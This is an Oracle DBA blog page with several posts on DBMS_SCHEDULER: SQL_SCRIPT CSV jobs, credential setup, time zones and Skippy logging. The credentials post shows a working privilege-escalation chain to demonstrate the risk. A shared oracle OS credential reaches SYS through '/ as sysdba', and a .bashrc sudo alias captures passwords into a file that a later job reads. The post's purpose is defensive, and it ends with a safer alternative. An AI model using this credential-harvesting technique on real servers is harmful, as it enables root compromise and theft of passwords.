The Anti-Kyte
Generating a CSV file with a SQL_SCRIPT Scheduler Job
Data Warehouse developers don’t ask for much really…a batch window sufficient to run their overnight batch in;
incoming files that conform to their specification; the ability to generate CSV files from a DBMS_SCHEDULER job without writing code that looks like a herd of zebras in a blizzard…
select '"'||emp.first_name||'","'||emp.last_name||'","'||j.job_title||'","'||d.department_name...
These days, there are numerous ways to accomplish this in Oracle, such as
What I’m going to look at here is a third option – using a SQL_SCRIPT scheduler job to take advantage of the formatting options available in SQL*Plus.
So, let’s leave those zebras in peace…
Environment and SetupAs with my previous post on this topic, I’m using a Virtualbox Oracle Developer Day Appliance running 19c database on Oracle Linux 7.6.
We will be running the scheduler job as the HR user.
To recap, the setup is as follows :
On the Server OSsudo useradd -M hr_etl
sudo passwd hr_etl
On the Database
A credential for the HR_ETL user on the Operating System, which is granted to the HR database user :
begin
dbms_credential.create_credential
(
credential_name => 'HR_ETL_OS_CREDENTIAL',
username => 'hr_etl',
password => 'Y3tanothercompl!catedpassword'
);
end;
/
grant execute on hr_etl_os_credential to hr;
A credential for the HR database user itself :
begin
dbms_credential.create_credential
(
credential_name => 'HR_DB_CREDENTIAL',
username => 'hr@orcl',
password => 'Mysupersecrethrpassw0rd!',
);
end;
/
grant execute on hr_db_credential to hr;
Privileges to execute external jobs for the HR user :
grant create job, create external job to hr;
This time, we’re going to need some directories to hold the report file we generate as well as a SQL script. These directories need to be accessible
to the OS user we’re connecting as to run the job ( HR_ETL).
In creating these directories, it would seem prudent to follow the practice of ensuring that HR_ETL ( and ultimately, any DB user with both access to the HR_ETL credential and CREATE DIRECTORY privileges) does not have write and execute access on any single directory.
Therefore, I’ll create the directories under the ownership of a different user and grant access to HR_ETL via the group.
In light of the shennanigans I got up to in the previous post, I’d suggest we don’t use oracle for this purpose. In this example, I’m using “mike”.
First, we’re going to create a group called ETL and assign hr_etl and mike to it :
sudo groupadd etl
sudo usermod -a -G etl hr_etl
sudo usermod -a -G etl mike
Next, we’ll create a directory structure to hold the relevant files :
mkdir /appdata
mkdir /appdata/output
mkdir /appdata/scripts
… and set etl to be the group…
sudo chgrp etl scripts
sudo chgrp etl output
Next, we’ll set the group permissions on the directories, including the sticky bit so any files inherit the permissions defined in the Access Control Lists that we’ll setup in a minute :
chmod g+s scripts
chmod g+s output
sudo chmod g+w output
chmod o-rwx output
chmod o-rwx scripts
The permissions on each directory now look like this :
drwxrws---. 1 mike etl 0 Dec 1 14:37 output
drwxr-s---+ 1 mike etl 48 Dec 1 12:02 scripts
So hr_etl has read and write permissions on OUTPUT an Read permissions on scripts thanks to it’s membership of the etl group.
Finally, we want to setup the Access Control Lists for the directories so that any files created in them will have the same permissions as those we’ve specified on the directory ( read write in OUTPUT and read only in SCRIPTS) :
setfacl -d -m g::r-- scripts
setfacl -d -m o::--- scripts
setfacl -d -m g::rw- output
setfacl -d -m o::--- output
To test :
touch /appdata/scripts/zebra.txt
ls -l /appdata/scripts/zebra.txt
-rw-r-----. 1 mike etl 0 Dec 1 14:55 /appdata/scripts/zebra.txt
touch /appdata/output/blizzard.txt
ls -l /appdata/output/blizzard.txt
-rw-rw-r--. 1 mike etl 0 Dec 1 14:55 /appdata/output/blizzard.txt
File Specification
The file needs to be in standard CSV format ( values enclosed in quotes and separated by commas).
Each record in the file requires a label to specify the type of record it is. The value will be one of :
- HEADER
- DATA
- TRAILER
The TRAILER record needs to be the last line in the file.
It needs to contain a timestamp for when the data was extracted and a count of the DATA rows in the file.
The filename needs to include the current date in it. The file format is :
employees_yyyymmdd.csvThe Report Query
We can fulfill a fair chunk of the file requirements in the report query itself.
To minimise the amount of code that I need to add to the finished job, and so that if (when) I need to do some investigation/debugging the query and it’s output are in easy reach, I’ve decided to create the report query as a view.
The clouds overhead seem to have miraculously cleared…
create or replace view employees_report_vw
as
with rpt_data as
(
select
'DATA' as row_type,
emp.first_name,
emp.last_name,
to_char(emp.hire_date, 'YYYY-MM-DD') as hire_date,
j.job_title,
d.department_name,
count(*) over () as record_count -- total number of records returned - same value on every row
from employees emp
inner join jobs j
on emp.job_id = j.job_id
left outer join departments d
on emp.department_id = d.department_id
)
select
row_type as header, -- row type of the header row.
first_name,
last_name,
hire_date,
job_title,
department_name
from rpt_data
union
select
'TRAILER',
to_char(systimestamp, 'YYYYMMDDHH24MISS'),
to_char(any_value(record_count)),
null,
null,
null
from rpt_data
order by 1 -- ensure the trailer record is output last
/
Querying the view we get :
Dynamically generating the filenameTo accomplish this, we’re going to use the SQL*Plus NEW_VALUE column formatting command :
clear screen
column fdate new_value v_date noprint
set verify off
select to_char(sysdate, 'YYYYMMDD') as fdate from dual;
select 'employees_&v_date..csv' from dual;
'EMPLOYEES_20241201.CS
----------------------
employees_20241201.csv
Other SQL*Plus settings
We want to specify that the output is in CSV format, with attributes double-quoted and separated with a comma :
set markup csv on delimiter , quote on
We also want to make sure that the spool off command doesn’t get echoed to the file and that the query result doesn’t clutter up the OUTPUT column in USER_SCHEDULER_JOB_RUN_DETAILS :
set echo off
set termout off
There’s a bit of a snag here as the echo and termout system variables are only effective when a script is being called. Therefore, I’m going to save the finished script to a file and copy it to the scripts directory on the server which we created earlier.
The finished article is called employees_report_job.sql and looks like this :
column fdate new_value v_date noprint
set verify off
select to_char( sysdate, 'YYYYMMDD') as fdate from dual;
set feedback off
set echo off
set termout off
set markup csv on delimiter , quote on
spool /appdata/output/employees_&v_date..csv
select * from employees_report_vw;
spool off
After all that, we can now setup and run the job from the comfort of the database…
set define off
declare
v_job_name varchar2(30) := 'EMPLOYEES_REPORT_JOB';
begin
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => '@/appdata/scripts/employees_report_job.sql',
credential_name => 'mike.hr_etl_os_credential',
enabled => false
);
dbms_scheduler.set_attribute
(
name => v_job_name,
attribute => 'connect_credential_name',
value => 'mike.hr_db_credential'
);
dbms_scheduler.enable(v_job_name);
end;
/
After running this we can check the job status :
select status, output
from user_scheduler_job_run_details
where job_name = 'EMPLOYEES_REPORT_JOB';
If we now check on the server, we can see that the file has been created in the output directory…
ls -l /appdata/output/employees_20241201.csv
rw-rw-rw-. 1 hr_etl etl 7226 Dec 1 16:11 /appdata/output/employees_20241201.csv
Checking the file itself …
head /appdata/output/employees_20241201.csv
"HEADER","FIRST_NAME","LAST_NAME","HIRE_DATE","JOB_TITLE","DEPARTMENT_NAME"
"DATA","Adam","Fripp","1997-04-10","Stock Manager","Shipping"
"DATA","Alana","Walsh","1998-04-24","Shipping Clerk","Shipping"
"DATA","Alberto","Errazuriz","1997-03-10","Sales Manager","Sales"
"DATA","Alexander","Hunold","1990-01-03","Programmer","IT"
"DATA","Alexander","Khoo","1995-05-18","Purchasing Clerk","Purchasing"
"DATA","Alexis","Bull","1997-02-20","Shipping Clerk","Shipping"
"DATA","Allan","McEwen","1996-08-01","Sales Representative","Sales"
"DATA","Alyssa","Hutton","1997-03-19","Sales Representative","Sales"
…and…
tail /appdata/output/employees_20241201.csv
"DATA","TJ","Olson","1999-04-10","Stock Clerk","Shipping"
"DATA","Tayler","Fox","1998-01-24","Sales Representative","Sales"
"DATA","Timothy","Gates","1998-07-11","Shipping Clerk","Shipping"
"DATA","Trenna","Rajs","1995-10-17","Stock Clerk","Shipping"
"DATA","Valli","Pataballa","1998-02-05","Programmer","IT"
"DATA","Vance","Jones","1999-03-17","Shipping Clerk","Shipping"
"DATA","William","Gietz","1994-06-07","Public Accountant","Accounting"
"DATA","William","Smith","1999-02-23","Sales Representative","Sales"
"DATA","Winston","Taylor","1998-01-24","Shipping Clerk","Shipping"
"TRAILER","20241201161121","107",,,
That should keep everyone happy, including the zebras.
Setting up a Credential for use in SQL_SCRIPT jobs without using the Oracle os user
In a recent post, Connor McDonald showed how to setup and use the SQL_SCRIPT scheduler job type to run SQL*Plus directly from the database.
Connor’s example enabled this functionality for a specific individual ( SCOTT) who already knew the Oracle OS account’s password and was therefore able to create a credential based on that user.
But what if we want to incorporate scheduler executed SQL*Plus scripts into an application, rather than just making it available to an individual ?
Tweaking Connor’s example, I’m going to attempt to :
- grant permissions on a credential to another user
- use the connect_credential_name job attribute to avoid hard-coding passwords
- explore the potential problem with using the oracle OS user as the object of a credential
- set up a Linux account to base the credential on instead
The environment I’m using is an Oracle Developer Day VM running Oracle Enterprise Edition 19c on Oracle Linux 7.6.
Granting privileges on DBMS_CREDENTIAL credentialsYes, Credentials are database objects, and as such are grantable. So, as a user with the CREATE CREDENTIAL privilege …
begin
dbms_credential.create_credential
(
credential_name => 'ORACLE_OS_CREDENTIAL',
username => 'oracle',
password => 'ThisisownlyknowntotheDBAhon3st!'
);
end;
/
grant execute on oracle_os_credential to hr;
We can also use a credential to connect to the database whilst in a SQL_SCRIPT job.
In this case, we need to include the database connect string in the username :
begin
dbms_credential.create_credential
(
credential_name => 'HR_DB_CREDENTIAL',
username => 'hr@orcl',
password => 'Mysupersecrethrpassw0rd!',
);
end;
/
grant execute on hr_db_credential to hr;
If the application we’re dealing with involves lots of batch jobs and file wrangling, the application owner schema may already have the required privileges. If not, then we would need to grant them :
grant create job, create external job to hr;
If we now connect as HR, we can see the credentials…
select owner, credential_name, username, enabled
from all_credentials
/
OWNER CREDENTIAL_NAME USERNAME ENABLED
--------------- ------------------------------ --------------- -----------
MIKE ORACLE_OS_CREDENTIAL oracle TRUE
MIKE HR_DB_CREDENTIAL hr@orcl TRUE
…as well as the privileges…
select privilege
from user_sys_privs
where privilege like '%JOB%';
PRIVILEGE
----------------------------------------
CREATE EXTERNAL JOB
CREATE JOB
Now HR can run a job to test the setup…
declare
v_job_name varchar2(128) := 'HR_TEST_JOB1';
v_script varchar2(32767);
begin
-- SQL*Plus statements included, but no connect string
v_script := q'[
column os_user format a20
column db_user format a20
column db_name format a20
select
sys_context('userenv', 'os_user') as os_user,
sys_context('userenv', 'current_user') as db_user,
sys_context('userenv', 'db_name') as db_name
from dual;]';
-- Jobs are created as DISABLED by default, so it won't run immediately...
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => v_script,
credential_name => 'mike.oracle_os_credential'
);
-- ...so we have a chance to add a credential to use to connect to the database
dbms_scheduler.set_attribute
(
name => v_job_name,
attribute => 'connect_credential_name',
value => 'mike.hr_db_credential'
);
-- now run the job
dbms_scheduler.enable(v_job_name);
end;
/
After executing this job, we can see that the test was succesful :
select output
from user_scheduler_job_run_details
where job_name = 'HR_TEST_JOB1'
/
OUTPUT
---------------------------------------------------------------
SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 18:55:54 2024
Version 19.3.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
SQL> Connected.
SQL> SQL> SQL> SQL> SQL> 2 3 4 5
OS_USER DB_USER DB_NAME
-------------------- -------------------- --------------------
oracle HR ORCL
SQL> Disconnected from Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.3.0.0.0
However, there is something of a security issue with creating a credential on the oracle os user.
Would you like root with that ?Whilst, in Connor’s example, the user created the credential themselves ( so presumably already “know” the oracle user OS password), that’s not the case here.
That means that we’ve effectively just given HR passwordless access to the database as SYS.
To demonstrate :
declare
v_job_name varchar2(128) := 'HR_TEST_JOB2';
v_script varchar2(32767);
begin
-- No sys password ? No problem !
v_script := q'[
conn / as sysdba
column os_user format a20
column db_user format a20
column db_name format a20
select
sys_context('userenv', 'os_user') as os_user,
sys_context('userenv', 'current_user') as db_user,
sys_context('userenv', 'db_name') as db_name
from dual;]';
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => v_script,
credential_name => 'mike.oracle_os_credential'
);
-- now run the job
dbms_scheduler.enable(v_job_name);
end;
/
This time, we’ve hard-coded a connect string rather than using the database user credential. The result is a bit worrying…
OUTPUT
------------------------------------------------------------------------------
SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 19:15:43 2024
Version 19.3.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
SQL> SQL> Connected.
SQL> SQL> SQL> SQL> 2 3 4 5
OS_USER DB_USER DB_NAME
-------------------- -------------------- --------------------
oracle SYS orclcdb
SQL> Disconnected from Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.3.0.0.0
Because the OS connection is as oracle, we can use the “/ as sysdba” connect string to connect as SYS.
It’s also worth bearing in mind that the credential can be used for jobs other than SQL_SCRIPT…
declare
v_job_name varchar2(30) := 'HR_EXTERNAL';
v_script varchar2(32767);
begin
v_script := 'whoami';
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'EXTERNAL_SCRIPT',
job_action => v_script,
credential_name => 'mike.oracle_os_credential',
enabled => TRUE
);
end;
/
select output
from user_scheduler_job_run_details
where job_name = 'HR_EXTERNAL'
/
OUTPUT
------------------------------
oracle
On this Oracle Linux server, oracle is on the sudoers list, which means HR can do something like this…
set define off
declare
v_job_name varchar2(30) := 'MWAHAHAHA';
v_script varchar2(32767);
begin
v_script := q'[/usr/bin/echo "alias sudo='echo -n \"[sudo] password for \$USER: \" && read -s -r password && echo -e \"\\n\" && echo \"\$USER:\$password\" >>/u01/userhome/oracle/stohelit.txt; echo \$password | $(which sudo) -S \$@'" >> /u01/userhome/oracle/.bashrc]';
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'EXTERNAL_SCRIPT',
job_action => v_script,
credential_name => 'mike.oracle_os_credential',
enabled => TRUE
);
end;
/
…which adds an alias for sudo to the oracle users .bashrc…
cat .bashrc
alias sudo='echo -n "[sudo] password for $USER: " && read -s -r password && echo -e "\n" && echo "$USER:$password" >>/u01/userhome/oracle/stohelit.txt; echo $password | /usr/bin/sudo -S $@'
This executes the next time anyone runs a sudo command whilst connected as oracle…
[oracle@localhost oracle]$ sudo ls -l
[sudo] password for oracle:
Meaning that the oracle OS password is saved into a file called stohelit.txt and can be retrieved by running something like :
declare
v_job_name varchar2(30) := 'UNLIMITED_POWER';
v_script varchar2(32767);
begin
v_script := 'ho /usr/bin/cat /u01/userhome/oracle/stohelit.txt';
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => v_script,
credential_name => 'mike.oracle_os_credential',
enabled => TRUE
);
end;
/
select output
from user_scheduler_job_run_details
where job_name = 'UNLIMITED_POWER'
/
With the password, it’s now possible to run commands as root ( using sudo).
Clearly, a rethink is required…
revoke execute on oracle_os_credential from hr;
Creating an OS user for SQL_SCRIPT jobs
What we need is an OS user who isn’t oracle. But what else do we need to do to make an account suitable for running SQL_SCRIPT jobs as ?
It turns out, that the minimum requirement is simply a password.
If the application already has an OS user associated with it, then you can use that.
If not then we need to create one.
Remember, in my case, I’m on Oracle Linux so it’s just a matter of…
sudo useradd -m hr_etl
sudo passwd hr_etl
…and that’s it.
The new account doesn’t even need to have the SQL*Plus executable in it’s $PATH…
[hr_etl@localhost ~]$ sqlplus /nolog
bash: sqlplus: command not found...
To demonstrate, we’ll connect to the database as the user with the CREATE CREDENTIAL privilege and …
begin
dbms_credential.create_credential
(
credential_name => 'HR_ETL_OS_CREDENTIAL',
username => 'hr_etl',
password => 'Y3tanothercompl!catedpassword'
);
end;
/
grant execute on hr_etl_os_credential to hr;
Now connected to the database as HR we use the new credential.
declare
v_job_name varchar2(128) := 'HR_TEST_JOB3';
v_script varchar2(32767);
begin
-- SQL*Plus statements included, but no connect string
v_script := q'[
column os_user format a20
column db_user format a20
column db_name format a20
select
sys_context('userenv', 'os_user') as os_user,
sys_context('userenv', 'current_user') as db_user,
sys_context('userenv', 'db_name') as db_name
from dual;]';
-- Using the new credential...
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => v_script,
credential_name => 'mike.hr_etl_os_credential'
);
dbms_scheduler.set_attribute
(
name => v_job_name,
attribute => 'connect_credential_name',
value => 'mike.hr_db_credential'
);
dbms_scheduler.enable(v_job_name);
end;
/
Better still, if we now try to login as SYS using the “/ as sysdba” syntax…
declare
v_job_name varchar2(128) := 'HR_TEST_JOB4';
v_script varchar2(32767);
begin
v_script := q'[
conn / as sysdba
column os_user format a20
column db_user format a20
column db_name format a20
select
sys_context('userenv', 'os_user') as os_user,
sys_context('userenv', 'current_user') as db_user,
sys_context('userenv', 'db_name') as db_name
from dual;]';
dbms_scheduler.create_job
(
job_name => v_job_name,
job_type => 'SQL_SCRIPT',
job_action => v_script,
credential_name => 'mike.hr_etl_os_credential'
);
dbms_scheduler.enable(v_job_name);
end;
/
…Oracle is having none of it…
select output
from user_scheduler_job_run_details
where job_name = 'HR_TEST_JOB4'
/
SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 20:09:43 2024
Version 19.3.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
SQL> SQL> ERROR:
ORA-01017: invalid username/password; logon denied
SQL> SQL> SQL> SQL> 2 3 4 5 SP2-0640: Not connected
SQL>
In an application such as this, you’ll probably want to use SQL_SCRIPT to read and write files on the operating system, in which case further configuration will be needed in terms of OS file permissions etc. As far as running the jobs is concerned though, you should be good to go.
AcknowledgementsThe sudo credential exploit above is based on a rather more elegant example in the SUDO_KILLER GitHub Repo.
Oracle DBMS_SCHEDULER – Getting in a tangle with Time Zones
DBMS_SCHEDULER’s slightly arcane but extremely flexible calendaring syntax allows myriad ways to determine when a batch job should run .
However, there is a limitation when it comes to specifying which time zone should be used by the scheduler.
The documentation says :
The calendaring syntax does not allow you to specify a time zone. Instead the Scheduler retrieves the time zone from the start_date argument. If jobs must follow daylight savings adjustments, then you must specify a region name for the time zone of the start_date. For example specifying the start_date time zone as ‘US/Eastern’ in New York ensures that daylight saving adjustments are automatically applied. If instead, the time zone of the start_date is set to an absolute offset, such as ‘-5:00’, then daylight savings adjustments are not followed and your job execution is off by an hour for half the year.
It goes on to explain that, when the start_date is null, the time zone is determined by ( in descending order of precedence) :
- the time zone set in the current session (if it’s a Region Name)
- the DEFAULT_TIMEZONE scheduler attribute
- the time zone of the SYSTIMESTAMP when the Job (or Window) is enabled
Unfortunately, when setting a start_time for a job from inside another scheduler job, things do not work as expected.
If we were on a new-fangled AI enabled version of Oracle, I’d suspect that DIANA has taken a dislike to me ( maybe it doesn’t like the way I format my code, or something).
However, as I’ve experienced this behaviour on the less judgemental 19c ( and earlier), further digging is probably required…
Let’s begin by confirming that everything works as it should when we setup a job interactively.
To start with, we’ll create a simple scheduler job :
begin
dbms_scheduler.create_job
(
job_name => 'SIMPLE_JOB',
job_type => 'PLSQL_BLOCK',
job_action => 'begin null; end;'
);
end;
/
We can see at this point that the job has no start_date :
select enabled, state, start_date,
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
ENABL STATE START_DATE
----- --------- -----------
FALSE DISABLED
Let’s check what the current session time zone is set to :
select sessiontimezone from dual;
SESSIONTIMEZONE
------------------------------
Europe/London
So, if we now set the job start_date…
exec dbms_scheduler.set_attribute('simple_job', 'start_date', to_date('2024-10-22 08:00', 'YYYY-MM-DD HH24:MI'));
exec dbms_scheduler.enable('simple_job');
… the scheduler should use the Session Time Zone :
select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
ENABL STATE START_DATE
----- ---------- ------------------------------------------
TRUE SCHEDULED 22-OCT-24 08.00.00.000000000 EUROPE/LONDON
No issues there, let’s see what happens when we…
Set the Start Date from another Scheduler JobLet’s start with a clean slate and drop and re-create the job :
exec dbms_scheduler.drop_job('simple_job');
begin
dbms_scheduler.create_job
(
job_name => 'SIMPLE_JOB',
job_type => 'PLSQL_BLOCK',
job_action => 'begin null; end;'
);
end;
/
This time, we’re going set the start_date for SIMPLE_JOB from another scheduler job :
declare
v_action varchar2(4000) :=
q'[
begin
dbms_scheduler.set_attribute('simple_job', 'start_date', to_date('2024-11-22 08:00', 'YYYY-MM-DD HH24:MI'));
dbms_scheduler.enable('simple_job');
end;]';
begin
dbms_scheduler.create_job
(
job_name => 'enable_job',
job_type => 'plsql_block',
job_action => v_action
);
end;
/
Now when we run ENABLE_JOB…
exec dbms_scheduler.run_job('enable_job');
…we can see that the scheduler has ignored the time zone altogether and instead applied an offset to UTC :
select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
ENABL STATE START_DATE
----- -------------------- -----------------------------------
TRUE SCHEDULED 22-NOV-24 08.00.00.000000000 +01:00
Furthermore, the offset specified in the START_DATE value does not match the offset for the Europe/London region for that date:
select extract( timezone_hour from timestamp '2024-11-22 08:00:00.00 Europe/London')
as offset_to_utc
from dual;
OFFSET_TO_UTC
-------------
0
Consequently the job will start an hour later than specified.
The FixIf you were paying attention, you’ll know that the fix is RTFM !
Yes, that quote from the documentation above is explicit :
If jobs must follow daylight savings adjustments, then you must specify a region name for the time zone of the start_date.
In other words…
exec dbms_scheduler.drop_job('enable_job');
declare
v_action varchar2(4000) :=
q'[
begin
dbms_scheduler.set_attribute
(
name => 'simple_job',
attribute => 'start_date',
value => to_timestamp_tz('2024-11-22 08:00 Europe/London', 'YYYY-MM-DD HH24:MI TZR')
);
dbms_scheduler.enable('simple_job');
end;]';
begin
dbms_scheduler.create_job
(
job_name => 'enable_job',
job_type => 'plsql_block',
job_action => v_action
);
end;
/
Now, when we run the start_date set job…
exec dbms_scheduler.run_job('enable_job');
…the Region we’ve specified is used …
select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
ENABL STATE START_DATE
----- -------------------- ------------------------------------------
TRUE SCHEDULED 22-NOV-24 08.00.00.000000000 EUROPE/LONDON
Why does this happen ?
For the moment, I’m going to assume that this is not caused by my reluctance to use commas at the start of the line in a select clause.
I’ve knocked up a procedure which will record the values of the relevant objects and save them to a log table. For this purpose, I’m using the Skippy framework, which will write to the SKIPPY_LOGS table.
NOTE – you will need to have SELECT on DBA_SCHEDULER_GLOBAL_ATTRIBUTE granted directly to the procedure owner for this to compile :
create or replace procedure log_tz_settings
as
cursor c_tz_settings is
select
sessiontimezone as session_tz,
value as default_timezone,
to_char(to_timestamp_tz( systimestamp), 'TZR') as systimestamp_tz
from dba_scheduler_global_attribute
where attribute_name = 'DEFAULT_TIMEZONE';
v_settings c_tz_settings%rowtype;
v_set_list varchar2(4000);
begin
open c_tz_settings;
fetch c_tz_settings into v_settings;
close c_tz_settings;
skippy.add_param('SESSION_TZ', v_settings.session_tz, v_set_list);
skippy.add_param('DEFAULT_TIMEZONE', v_settings.default_timezone, v_set_list);
skippy.add_param('SYSTIMESTAMP_TZ', v_settings.systimestamp_tz, v_set_list);
skippy.log(v_set_list);
end;
/
When we execute this procedure in an interactive session, we can see that the values are as expected :
clear screen
set serverout on
exec skippy.enable_output;
exec log_tz_settings;
PL/SQL procedure successfully completed.
SESSION_TZ => Europe/London, DEFAULT_TIMEZONE => PST8PDT, SYSTIMESTAMP_TZ => +01:00
However, if we now add a call to this procedure in the ENABLE_JOB :
exec dbms_scheduler.drop_job('enable_job');
declare
v_action varchar2(4000) :=
q'[
begin
skippy.set_msg_group('CHECK_TZ_SETTINGS');
log_tz_settings;
dbms_scheduler.set_attribute
(
name => 'simple_job',
attribute => 'start_date',
value => to_date('2024-11-22 08:00', 'YYYY-MM-DD HH24:MI')
);
dbms_scheduler.enable('simple_job');
end;]';
begin
dbms_scheduler.create_job
(
job_name => 'enable_job',
job_type => 'plsql_block',
job_action => v_action
);
end;
/
…and run it again…
exec dbms_scheduler.run_job('enable_job');
select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
NABL STATE START_DATE
----- -------------------- -----------------------------------
TRUE SCHEDULED 22-NOV-24 08.00.00.000000000 +01:00
When we check the log, we can see that the SESSIONTIMEZONE value is not what we expected :
select message
from skippy_logs
where message_group = 'CHECK_TZ_SETTINGS'
/
MESSAGE
---------------------------------------------------------------
SESSION_TZ => +01:00, DEFAULT_TIMEZONE => PST8PDT, SYSTIMESTAMP_TZ => +01:00
Incidentally, the Scheduler Default Timezone (PST8DT) currently has an offset of -7 hours to UTC.
Therefore, we can infer that the SESSIONTIMEZONE value is being used even though it’s an absolute offset rather than a region name in the session that the Scheduler Job is running in.
Assorted Time Zone InformationOracle provides a list of valid Region Names in the form of V$TIMEZONE_NAMES. For example …
select tzname, tzabbrev
from v$timezone_names
where tzname = 'UTC'
/
TZNAME TZABBREV
-------------------------------------------------- ----------
UTC GMT
If we look at the currently defined Region in my session, we can see multiple TZABBREV values that appear to represent daylight savings changes …
select tzname, tzabbrev
from v$timezone_names
where tzname = sessiontimezone
/
TZNAME TZABBREV
-------------------------------------------------- ----------
Europe/London LMT
Europe/London GMT
Europe/London BST
Europe/London BDST
Using the built-in TZ_OFFSET function, we can establish the current UTC offset for a Region…
select tz_offset('Europe/London') from dual;
TZ_OFFS
-------
+01:00
To see which particular abbreviation this offset relates to :
select to_char(current_timestamp, 'TZD') from dual;
TO_CHA
------
BST
If we want to know which particular Timezone abbreviation will apply for any given month in the year, and when they will change, we may need to write something a bit fiddly like :
select
to_char( to_date( rownum, 'MM'), 'Month') as "Month",
-- Using 10:08 as the time because that's what you see in all the watch/clock adverts. Phones too.
-- This time was apparently chosen because, on an Analog clockface the hands are forming a "smile".
to_char
(
to_timestamp_tz
(
extract( year from sysdate)||'-'||
to_char( lpad( rownum, 2, '0'))||'-'||
'01 10:08:00 Europe/London', 'YYYY-MM-DD HH24:MI:SS TZR'
),
'TZD'
) as "Start of Month TZ Abbreviation",
to_char
(
to_timestamp_tz
(
extract( year from sysdate)||'-'||
to_char( lpad( rownum, 2, '0'))||'-'||
to_char( last_day( to_date( rownum, 'MM')), 'DD')||
' 10:08:00 Europe/London', 'YYYY-MM-DD HH24:MI:SS TZR'
),
'TZD'
) as "End of Month TZ Abbreviation"
from dual
connect by rownum <= 12;
What’s that ? You think DIANA may have a point about my code formatting ? Honestly, everyone’s a critic ! Anyhow, the output looks like this :
Other Useful LinkI bet Tim Hall never has this trouble. Also, his Oracle Base article on setting Time Zones is typically thorough.
Skippy – Displaying log messages using DBMS_OUTPUT
I’ve added a feature to the Skippy framework which makes it possible to see log messages in an interactive session, as well as in the log table.
You can find Skippy on GitHub.
Now, Skippy isn’t really into cricket – Rugby League is more of a Kangaroo sport – but I am, which may go some way to explaining the examples that follow.
The England’s continuing Bazball adventure has met with contrasting fortunes over the last week or so.
In this first example, we can see the sort of logging that you might find in long-running scheduler batch jobs :
begin
skippy.set_msg_group('FIRST_TEST');
skippy.log('Day 1 : Pakistan 328/4');
skippy.log('Day 2 : Pakistan 556 all out, England 96/1');
skippy.log('Day 3 : England 492/3');
skippy.log('Day 4 : England 823/7 dec, Pakistan 152/6');
skippy.log('Day 5 : Pakistan 220 all out');
skippy.log('Result : England win by an innings and 47 runs');
end;
/
After running this, we have to hunt around in the SKIPPY_LOG table to find the log messages :
select log_ts, message
from skippy_logs
where message_group = 'FIRST_TEST'
order by log_ts;
If we want to execute code in an interactive session, we can now read the log messages in the session itself.
To do this :
- enable SERVEROUTPUT in your interactive session so you can see the messages
- call the new SKIPPY.ENABLE_OUTPUT procedure.
- call SKIPPY.DISABLE_OUTPUT to toggle this feature off.
For example…
set serverout on
begin
skippy.set_msg_group('SECOND_TEST');
skippy.enable_output;
skippy.log('Day 1 : Pakistan 259/5');
skippy.log('Day 2 : Pakistan 366, England 239/6');
skippy.log('Day 3 : England 291, Pakistan 221, England 36/2');
skippy.log('Day 4 : ERROR - England batting failed 144 all out');
skippy.log('Result : Pakistan win by 152 runs');
-- optionally turn output off
skippy.disable_output;
end;
/
As well as outputting to the screen, SKIPPY still writes the log messages to the table.
What’s that Skippy ? SYS_CONTEXT USERENV Parameters in the database don’t match the docs ?
The USERENV namespace lurks in one of the darker corners of your Oracle Databse.
In conjunction with the SYS_CONTEXT function, it’s incredibly useful if you want to know what’s happening in your session environment at any given time.
However, the parameters defined for this namespace are locked away beyond the reach of mere mortals, which means you have to rely on the documentation to know which parameters are valid on which version of Oracle.
You might think that’s not really a problem, after all, Oracle Documentation is pretty reliable, right ?
Yes…mostly…
Having grown lazy over the year and decided that I wanted to do as little typing as possible when logging from my PL/SQL code, I wrote a simple framework called Skippy, which is on GitHub, if you’re interested.
One element of Skippy is a simple table which holds a list of all the available parameters for the USERENV namespace and the version from which they are valid. There is also a view – SKIPPY_ENV, which overlays the table and returns values for the parameters which are valid for the Oracle version it’s currently running.
Originally, the parameters listed in the table were gleaned from the Oracle documentation. The most recent examples of which are :
Unfortunately, there are a couple of discrepancies between the documentation and the database.
According to the 19c documentation, CDB_DOMAIN is a valid parameter on 19c, whilst CLOUD_SERVICE is not mentioned.
Meanwhile, IS_APPLICATION_ROOT and IS_APPLICATION_PDB are absent from the 23ai docs, despite them having been around since 19c.
The reality on 19c is that CDB_DOMAIN is not valid, but CLOUD_SERVICE is (tested on an OCI Free Tier instance) :
select product, version_full
from product_component_version;
PRODUCT VERSION_FULL
-------------------------------------------------- --------------------
Oracle Database 19c Enterprise Edition 19.24.0.1.0
select sys_context('userenv', 'cdb_domain') as cdb_domain from dual;
…results in…
ORA-02003: invalid USERENV parameter
By contrast…
select sys_context('userenv', 'cloud_service') as cloud_service from dual;
CLOUD_SERVICE
--------------------
OLTP
select sys_context('userenv', 'is_application_root') as is_application_root from dual;
IS_APPLICATION_ROOT
--------------------
NO
select sys_context('userenv', 'is_application_pdb') as is_application_pdb from dual;
IS_APPLICATION_PDB
--------------------
NO
Meanwhile, it appears that IS_APPLICATION_ROOT and IS_APPLICATION_PDB are still valid on 23ai. This time, I’ve tested on a VirtualBox Dev Day Appliance :
select product, version_full
from product_component_version;
PRODUCT VERSION_FULL
-------------------------------------------------- --------------------
Oracle Database 23ai Free 23.4.0.24.05
